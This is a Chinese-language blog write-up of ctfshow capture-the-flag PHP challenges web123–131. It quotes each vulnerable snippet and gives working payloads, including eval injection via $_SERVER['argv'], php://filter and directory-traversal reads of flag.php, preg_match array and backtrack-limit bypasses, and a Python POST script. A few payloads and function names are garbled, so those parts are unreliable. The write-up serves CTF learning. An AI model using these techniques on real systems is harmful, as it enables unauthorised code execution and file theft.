ctfshow web123-131

最新推荐文章于 2025-08-22 13:05:42 发布
原创 最新推荐文章于 2025-08-22 13:05:42 发布 · 932 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

web 123

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

就是条件判断POST传入的值有咩有CTF_SHOW,CTF_SHOW.COM以及GET方式传参不能有fl0g,然后正则表达式过滤了一部分的符号,然后执行eval函数,其中的变量c来自POST方式传入的fun。
然后这道题的重点是

$a=$_SERVER['argv'];

$_SERVER[‘argv’]在命令行界面是用法是获取脚本的命令行参数,比如运行php renascence.php argv1 argv2 那 $_SERVER[‘argv’];里的值就是这样的

$_SERVER['argv'][0]=renascence.php #脚本名
$_SERVER['argv'][1]=argv1 #第一个参数名
$_SERVER['argv'][2]=argv2 #第二个参数名

但是这些是在命令行界面中因为网页访问时缺少命令行环境,所以一般不会有啥有用的参数,因为网页版不会有命令行参数,但是可能会把查询字符串或者一些其他的字符传入 $ a=$_SERVER[‘argv’]中

这里GET传入过滤了fl0g,但是没有过滤$f10g,因为GET是一个数组,php不会因为你的名字叫 $f10g就把他当作一个变量,他只是一个字符串,所以可以用我们即使用$10g传参 isset( $_GET[‘fl0g’)也会返回flase

然后过滤CTF_SHOW,CTFSHOW.COM我们在post传参中加上即可通过当这一部分也为true时候就会触发eval 而这个是我们可控的所以我们可以用eva([a[0])来获得a的第一个参数,而a的第一个参数是他的文件名字

此时的 $_SERVER[‘argv’][0]其实是 $_SERVER[“QUERY_STRING”]是一个查询语句,当我们访问 $flag=flag_give_me时候,服务器就会将这条查询放入 $_SERVER[‘argv’][0]中,他现在包含了所有的查询字符串

然后eval函数执行的时候执行的eval(a[0]),因为0是我们查询的这条语句$flag=flag_give_me所以php就会真的定义这个变量然后赋值,所以我们就能同通过 if( $fl0g===“flag_give_me”)这个强等于类型,同样要用中括号报错来让后面的语句成功,所以我们这道题的payload就是

?$ fl0g=flag_give_me;
CTF_SHOW=&CTF[SHOW.COM=&fun=eval($a[0])

还有另外一种解法,在我们url传参的时候如果出现空格或者.的话会被解析为下划线,而在php8之前如果传参的过程中出现中括号就会解析为下划线并且转换报错,之后的空格和.就不会在被解析,然后正则表达中也没有过滤字母和空格所以我们payload为

CTF_SHOW=&CTF[SHOW.COM=&fun=echo $flag

web 125

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print/i", $c)&&$c<=16){
         eval("$c".";");
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

如上,只是第二种解法不能用了

web126

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?|flag|GLOBALS|echo|var_dump|print|g|i|f|c|o|d/i", $c) && strlen($c)<=16){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}

同上

web127


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];


//特殊字符检测
function waf($url){
    if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){
        return true;
    }else{
        return false;
    }
}

if(waf($url)){
    die("嗯哼?");
}else{
    extract($_GET);
}


if($ctf_show==='ilove36d'){
    echo $flag;

extracrt就是将数组中的变量导入到当前的符号表内
还是我们上面讲道德知识点,因为有正则过滤掉了_所以不能直接打出ctf_show所以,当Url直接给传参时候出现空格和.都会被转换为_下划线,所以利用这个特性payload就是

?ctf show=ilove36d

web128


error_reporting(0);
include("flag.php");
highlight_file(__FILE__);

$f1 = $_GET['f1'];
$f2 = $_GET['f2'];

if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}



function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);

这题得用一个新的自是

()是gettext的扩展形式,当开启特定参数后就会打开,(666)就会返回数组的值
get_fined_vars这个函数会返回所有自定义的变量组成的数组的值

所以这道题的Payload就是

?f1=_f2=get_fined_vars

web 129


error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
    $f = $_GET['f'];
    if(stripos($f, 'ctfshow')>0){
        echo readfile($f);
    }
}

题目要求传入的参数f里面要有ctfshow并且位置不能在开头,如果通过的话就执行读取文件所以我们可以用php伪协议,目录穿越来解决

?f=php://filter/convert.base64-encode/ctfshow/resource=flag.php
?f=php://filter/ctfshow/resource=flag.php
?f=/ctfshow/…/…/…/…/…/…/…/var/www/html/flag.php

web 130

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = $_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f, 'ctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;

}

一个正则匹配,一个对比ctfshow必须要有ctfshow,但是正则匹配的是
.表示匹配单个字符,+表示至少出现一次,+?表示重复一次或多次,尽量少
ctfshow,但是Post方式直接上传就行,也可以通过数组绕过,正则表达null不等于flase所以正则可以绕过,而且0===flase也不成立,所以对比也能让绕过,所以payload为,

f=ctfshow
f=[]1

web 131

error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];

    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }

    echo $flag;

}

这道题目会进行字符串转换,所以这次要用目录溢出,也就是preg_match 对正则匹配有次数限制,超过次数限制,直接返回flase

> import requests
url="https://88344fb1-8742-4e79-a59b-ee4ab13fb395.challenge.ctf.show"
data={'f':'very'*250000+'36Dctfshow' }
r=requests.post(url,data=data,verify=False)
print(r.text)
Z_renascence
关注
【CTF-Web】XSS漏洞学习笔记(附ctfshow web316-333题目)
brhhh_sehe的博客
12-19 1135
用户在输入框中输入图片地址存储到str变量中 然后在xss()函数里面给id为demo的标签设置内容(innerHTML) 内容是加载图片,所以我们输入时放一个无法加载的图片,然后触发onerror事件,在这个事件里面可以触发弹窗,注意构造payload的时候一定要把img标签进行闭合。自己语言的转义:我认为就是在该网站中,比如说存在留言功能,然后攻击者留言了一段恶意代码,这段留言是别的用户也可以访问到的,在其他用户查看这段留言的时候服务器进行解析,导致执行一些危险行为,这个整段过程就是跨站脚本攻击。
代码审计(ctfshow web301-304)
m0_72929232的博客
02-09 583
mysql的特性: 在联合查询并不存在的数据时,联合查询就会构造一个。数据就相当于构造了一个虚拟账户,可以使用这个账户登录。sql文件里有admin用户名,密码也是admin。登录上在dptadd.php注入。304用303的做法也可以。登录进去得到flag。
ctfshow web123-127
akxnxbshai的博客
02-08 3600
目录 Web 123 Web 125 Web 126 Web 127 Web 123 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: [email protected] # @link: https://ct
ctfshow-web-123-150-wp
2301_80915592的博客
12-02 1095
通过$_SERVER['argv']将$a变成数组,再利用数组的性质将fl0g=flag_give_me传入,同时还绕过第一个if中的!执行eval函数也就是执行$c即是parse_str($a[1]),使得fl0g=flag_give_me,从而进入第三个if语句。所以我们我们输入的ctf_show是get传参,然后被$_SERVER['QUERY_STRING']获取赋值给$url,然后进行waf匹配,所以其实就是?,先学习一下这个函数,第一个参数是被调用的函数,第二个是调用的函数的参数。
CTFSHOW WEB 123-128
2401_87431975的博客
08-05 317
源码这个代码并不复杂,主要就是连续调用了两次call_user_func函数,首先要明白这个函数的作用$callback是要调用的函数名(字符串)或类方法(数组)。其余参数:传给这个函数的参数。题目里面的f1将字母都过滤了,f2是不受限制的,所以这里就有一个比较冷的知识点了就是gettext()这个函数,这个函数还有一个别名叫_() 这是一个无字母的函数,所以就可以绕过了;展示playload:url/?当然想要彻底看懂playload,要搞清楚_()函数的用法。
CTFshow--web--xss
pwfortune的博客
07-16 1277
先在自己的服务器写上代码要拿到管理员的cookie , 而不是自己的。
CTFshow-web入门-php-web89-150
m0_72655585的博客
07-17 1789
也就是说,当给intval()函数传入一个非空的数组时,intval()函数将会返回1,结合我们preg_match()传入数组返回false的特性,这道题的payload就很清楚了。在php中变量名只有数字字母下划线,被get或者post传入的变量名,如果含有空格、+、[则会被转化为_,所以按理来说我们构造不出CTF_SHOW.COM这个变量(因为含有.),但php中有个特性就是如果传入[,它被转化为_之后,后面的字符就会被保留下来不会被替换。system(‘FLASE’),空指令,失败返回FLASE。
ctfshow-web入门-123-150_plus-php特性
2402_86944075的博客
05-12 737
正则表达式要求 f1 和 f2 只能是数字和小写字母,$f2() 被视为一个函数调用,$f1 作为函数名调用 $f2() 的返回值,最后进行弱比较,由于 'ctfshow' 转换为整数是 0,因此条件实际上是检查 intval($code) 是否为 0。isset($_GET['fl0g'])),用+来进行分隔,使得数组中有多个数值。php 扩展目录下如果有 php_gettext.dll,就可以用 _() 来代替 gettext() 函数,_() 就是 gettext() 的别名,常常被用来简化代码。
CTFshow--Web--代码审计
pwfortune的博客
07-29 1866
service/service.php , 也存在 clearCache()的调用, 而且在logout.php里面require了service.php,查询不到内容, 会在数据库中创建一个数据 123 , 那么这个123就会作为一个返回的数据, 用以跟用户输入的密码进行比较 , 相匹配的话就行登录进去了。在index.php下面 ,能够调用 checkVersion()函数 , 虽然header 头跳转了,但是还是会执行后面的代码。向服务端发送请求时,服务端会等待我们发送数据,处于wait状态。
ctfshow web100-105
2302_77769584的博客
07-24 1347
ctfshow 100-105
ctfshow web入门--反序列化
2402_87078084的博客
03-10 292
这道题还是更偏向于代码审计,而且一开始就给出了username和password。
ctfshow-sqli-libs笔记(web517-web539)
Yasso的博客
09-08 777
> 好久没做基础的sql注入题了,平台上发现sqli-libs,网课无聊打一下 发布后自动把我的单引号改成了中文格式,不知道为啥 web517 {字符型注入-联合查询} id=1’ and 1=1–+ 正常回显 id=1’ and 1=2–+ 异常回显 id=0’ order by 3–+ 查询字段数为3 id=0’ union select 1,2,database()–+ 爆出当前数据库为security—真正flag在ctfshow数据库里… id=0’ union select 1
反序列化5(ctfshow web274-276)
m0_72929232的博客
02-03 451
但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化 manifest 中的字符串,采用 phar 协议来读取即可。这题phar的extension整了半天,最后是找到现在版本的php.ini里面搜phar把前面分号去了然后那俩On要改成Off。filename就是传入的fn,传入?新增对admin判断,我们需要修改admin为 true 才会进入 system。还要结合条件竞争,在phar文件还没有被删除前访问到它,触发反序列化。
网络安全实验报告】实验六: 病毒防护实验
m0_73970214的博客
08-18 444
本实验通过Metasploit框架演示"永恒之蓝"漏洞的渗透过程。在KaliLinux环境下,首先使用smb_ms17_010模块扫描目标网段,确认靶机存在漏洞后,切换至ms17_010_eternalblue攻击模块进行渗透。成功获取权限后,上传并执行勒索病毒Wcry.exe,验证文件加密效果。实验需注意环境配置和系统版本确认,完整过程记录和成果文件可通过指定网盘链接获取。实验展示了永恒之蓝漏洞的完整利用链,包括扫描、渗透、载荷传递等关键环节。
Web安全攻防基础
qq_62189139的博客
08-19 1222
本文总结了常见的Web安全漏洞及防范措施。主要内容包括:1)SQL注入的原理、防范技巧和基本流程,强调预编译是最有效防范方式;2)XSS的分类(反射型、存储型、DOM型)及修复方法,建议输入输出过滤;3)文件上传漏洞的检测手段和绕过方式,如解析漏洞利用;4)业务逻辑漏洞类型(验证绕过、越权访问等);5)CSRF、XXE漏洞原理及与XSS的区别;6)文件包含漏洞的防范措施;7)Tomcat远程部署漏洞利用方法。
【学习笔记】网络安全专用产品类别与参考标准
tpriwwq的专栏
08-21 743
本文系统梳理了我国网络安全领域的技术标准体系,涵盖36类网络安全产品和系统的国家标准(GB)和行业标准(GA)。
安全、高效、可靠的物理隔离网络安全专用设备———信刻光盘安全隔离与文件单向导入系统!
最新发布
cdprinter的博客
08-22 115
信刻最新推出安全、高效、可靠的物理隔离网络安全专用设备——光盘安全隔离与文件单向导入系统,基于物理隔离机制确保跨网数据传输安全,真正实现物理隔离网间数据交换既安全又高效,可追溯!产品利用智能机械手臂模拟人工自动抓盘刻录和读取,完成一系列光盘单向导入/导出操作。支持国产及Linux环境、Windows环境,此外,数据摆渡产品具备国家保密测评中心认证证书、网络安全证书,符合保密要求。
CRaxsRat v7.4:网络安全视角下的深度解析与防护建议
lzj781210的博客
08-21 146
CRaxsRat v7.4 并不是普通用户能“利用”的工具,它在现实中大多扮演着木马病毒的角色。对于我们而言,最重要的并不是学习如何使用,而是要了解它的危害,增强防范意识。只有不断提升个人的信息安全素养,才能在数字时代保护好自己的隐私与财产。
软件测试:如何利用Burp Suite进行高效WEB安全测试
2503_92839163的博客
08-20 421
Burp Suite 被广泛视为 Web 应用安全测试领域的行业标准工具集。要发挥其最大效能,远非简单启动扫描即可,而是依赖于测试者对其模块化功能的深入理解、有机组合及策略性运用。一次高效的测试流程,始于精细的环境配置与清晰的测试逻辑。
CTFShow-Web6
09-06
根据提供的引用内容,CTFShow-Web6可能是一个数据库名。其中,通过注入语句查询数据库web2中的表信息,得到两张表flag和user。具体的注入语句如下所示: ``` username=1'/**/union/**/select/**/1,group_concat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值